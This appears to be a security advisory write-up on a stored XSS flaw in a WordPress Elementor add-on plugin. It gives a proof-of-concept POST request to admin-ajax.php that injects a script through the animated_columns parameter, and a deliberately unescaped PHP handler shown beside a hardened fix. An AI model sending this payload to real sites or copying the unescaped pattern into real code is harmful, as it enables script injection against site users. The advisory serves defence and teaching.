CVE-2021-24351 – Stored XSS in The Plus Addons for Elementor (WordPress Plugin)
CVE ID: CVE-2021-24351
System Affected: WordPress
Vulnerability Type: Stored Cross-Site Scripting (XSS)
CNA Score (CVSS v3.1): 6.1 (Medium)
Affected Plugin: The Plus Addons for Elementor
Vulnerable Versions: < 4.1.12
Exploit Type: Remote, Authenticated
Overview
CVE-2021-24351 is a stored Cross-Site Scripting (XSS) vulnerability affecting The Plus Addons for Elementor plugin for WordPress, prior to version 4.1.12. This vulnerability allows an authenticated attacker (with Contributor or higher role) to inject malicious JavaScript code into specific plugin parameters which, when rendered in the admin dashboard or front-end, will execute in the victim’s browser context.
This vulnerability arises due to insufficient input sanitization and output escaping on dynamic content parameters used by the plugin. The injected scripts can persist in the database and get executed on future page views, making it a stored variant of XSS.
Proof of Concept (PoC)
The following HTTP request demonstrates how the vulnerability can be exploited using a POST request to admin-ajax.php:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Connection: close
action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e
In this payload, the vulnerable parameter animated_columns accepts unsanitized input which is later rendered directly into the HTML DOM. The JavaScript payload (<script>alert(/XSS/)</script>) is stored in the backend and executed whenever the element is displayed.
Technical Analysis
- Entry Point: admin-ajax.php with action theplus_more_post
- Vulnerable Parameter: animated_columns
- Root Cause: Lack of input sanitization and output escaping (sanitize_text_field(), esc_html()) on dynamic parameters.
- Impact: Malicious scripts can be stored and executed in the admin or frontend UI, leading to session hijacking, privilege escalation, or redirection attacks.
Mitigation
The issue was addressed in version 4.1.12 of the plugin. Site administrators are strongly advised to:
- Update the plugin to the latest version immediately.
- Sanitize and validate user inputs at both client and server levels.
- Use a Web Application Firewall (WAF) to detect and block malicious POST requests.
- Restrict sensitive plugin features to trusted user roles only.
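To make the root cause from the Technical Analysis and the "sanitize and validate" mitigation concrete, here is an added example (not the plugin's own code) of a hypothetical admin-ajax.php handler that echoes animated_columns into a class attribute unescaped, beside a hardened version that validates the value against an allow-list and escapes it at the output point. The handler names, nonce action, allowed column counts and markup are assumptions; wp_ajax_* hooks, check_ajax_referer(), wp_unslash(), sanitize_text_field(), esc_attr() and wp_die() are standard WordPress functions.

```php
<?php
// Added example, not the plugin's code: a hypothetical AJAX handler modelled on
// the PoC request (action=theplus_more_post&animated_columns=...).

// VULNERABLE pattern: the raw POST value lands inside an HTML attribute.
// A value such as  test"><script>alert(/XSS/)</script>  closes the attribute
// and injects a script element, which is exactly what the PoC relies on.
function demo_more_post_vulnerable() {
    $columns = isset( $_POST['animated_columns'] ) ? $_POST['animated_columns'] : '';
    echo '<div class="theplus-grid columns-' . $columns . '"></div>';
    wp_die(); // end the admin-ajax.php response
}

// HARDENED pattern: verify intent, validate against the values the template
// actually supports, and still escape for the attribute context on output.
function demo_more_post_hardened() {
    // Nonce check ties the request to a form the site issued (assumed nonce action name).
    check_ajax_referer( 'demo_more_post_nonce', 'security' );

    $raw = isset( $_POST['animated_columns'] )
        ? sanitize_text_field( wp_unslash( $_POST['animated_columns'] ) )
        : '';

    // Allow-list: a column count has no business containing markup (assumed set).
    $allowed = array( '1', '2', '3', '4' );
    $columns = in_array( $raw, $allowed, true ) ? $raw : '3';

    // Attribute context, so esc_attr(); esc_html() is the choice for text nodes.
    echo '<div class="theplus-grid columns-' . esc_attr( $columns ) . '"></div>';
    wp_die();
}

// Only the hardened handler is registered (assumed action name); the vulnerable
// function is kept above purely for side-by-side comparison.
add_action( 'wp_ajax_demo_more_post_hardened', 'demo_more_post_hardened' );
```

The allow-list is the actual fix, since it rejects the payload before it reaches the template; esc_attr() is defence in depth in case the value is later reused in another attribute.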
About XSS (According to OWASP)
Cross-Site Scripting (XSS) is a common vulnerability that allows attackers to inject malicious scripts into web applications. When executed in the context of another user’s browser, these scripts can steal cookies, redirect users, deface web pages, or launch phishing attacks.
Types of XSS:
- Stored XSS: Malicious code is stored on the server (e.g., in the database) and served to other users.
- Reflected XSS: Payload is reflected in real-time from the request into the response.
- DOM-based XSS: Execution occurs via client-side JavaScript manipulation of the DOM.
Prevention Tips (OWASP):
- Sanitize user inputs.
- Escape outputs before rendering them in HTML, JS, or attributes.
- Use frameworks that auto-escape by default (e.g., React, Angular).
- Employ Content Security Policy (CSP).
Reference: OWASP XSS Guide
Conclusion
CVE-2021-24351 serves as a reminder that even trusted WordPress plugins can harbor critical security flaws. By exploiting this vulnerability, an attacker with authenticated access could execute persistent scripts, compromising the security of both users and administrators. Immediate patching, secure coding practices, and user permission management are key to mitigating such risks.
References